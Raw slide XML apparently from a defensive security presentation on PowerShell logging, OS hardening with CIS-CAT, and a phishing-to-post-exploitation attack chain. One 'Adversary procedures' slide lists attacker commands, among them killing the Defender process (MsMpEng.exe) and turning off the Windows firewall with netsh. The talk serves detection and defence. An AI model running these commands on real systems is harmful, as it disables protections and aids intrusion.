          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512405" y="2508996"/>
            <a:ext cx="2914141" cy="3889585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1852536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https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html</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a:xfrm>
            <a:off x="671757" y="365069"/>
            <a:ext cx="8184662" cy="512755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4E70AB-6456-4491-B4C0-ACB51FEC6472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="213980" y="1848755"/>
            <a:ext cx="8716040" cy="5009246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3242173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64168B-E36D-4EB2-A28D-CC4560E6DC11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…You know like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nishang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modules, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3705456A-2111-4BBD-8691-86277F41C703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn On PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Module Logging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E760B613-DCFA-466D-B6B4-EEAEC06F074C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3361181" y="2693852"/>
            <a:ext cx="5495238" cy="4000000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2797197D-29EF-47E2-BCA4-1A89F9FC7D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="11073" t="33039" r="12996" b="24082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-322117" y="3577735"/>
            <a:ext cx="4378034" cy="1854200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1421298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733E3-507B-40B1-9634-98ADB701EAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659305" y="2320239"/>
            <a:ext cx="8197114" cy="1108761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E4149E-A4DF-45A1-B5F3-56BCDEFCA89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1FB944E-68A4-44DC-B7F9-B0AD6F19CD21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable PowerShell Script Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logging (Detection) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E032FE59-9144-41BB-8B5F-F3EC86A641A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1730667"/>
            <a:ext cx="5651482" cy="4865030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947A607D-E966-4E10-AAF5-B39F816D20E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="15000" t="22886" b="9083"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4903446" y="2410579"/>
            <a:ext cx="4865031" cy="3505199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25098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59305" y="2141838"/>
            <a:ext cx="8197114" cy="4417457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following presentation contains my thoughts, ideas and opinions. They do not represent those of my current or past employers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any events, characters and company depicted in the course of this presentation are purely fictitious. Any similarity to actual events, characters and company is merely coincidental.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use these tactics/techniques presented for evil.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WARNING…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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431693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DB527B-F40C-4A2B-82FD-F9400B4A863E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2917861" y="2393879"/>
            <a:ext cx="5938558" cy="3804697"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically find Secure configs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS-CAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Configuration Assessment Tool. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/CIS-CAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Config Benchmarks for the How to!</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardening!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D029225-6DC8-4D5D-9635-8CDDDB9EFD42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2309807"/>
            <a:ext cx="2916577" cy="3888769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="6453554"/>
            <a:ext cx="5143500" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: Reference: https://learn.cisecurity.org/cis-cat-landing-page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133751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1757" y="2241211"/>
            <a:ext cx="6268325" cy="2438740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phish | Click Attachment | Attacker gains C2C | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PostExploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Tactic?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="6365557"/>
            <a:ext cx="5389684" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="3596054"/>
            <a:ext cx="8184662" cy="2769503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2132018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303987-5A38-41EA-ADFB-167743B2288B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92468" y="677007"/>
            <a:ext cx="8763951" cy="686501"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What exactly is that? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFA9BD8-ABED-460C-9A98-77255BBF48C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121630" y="924955"/>
            <a:ext cx="1117614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>¯\_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>ツ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>)_/¯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F18E9A-3CAE-4A4D-8116-9E71A30ED25D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63836" y="2522369"/>
            <a:ext cx="5322013" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qwinsta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> MsMpEng.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>currentprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> state off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domainprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
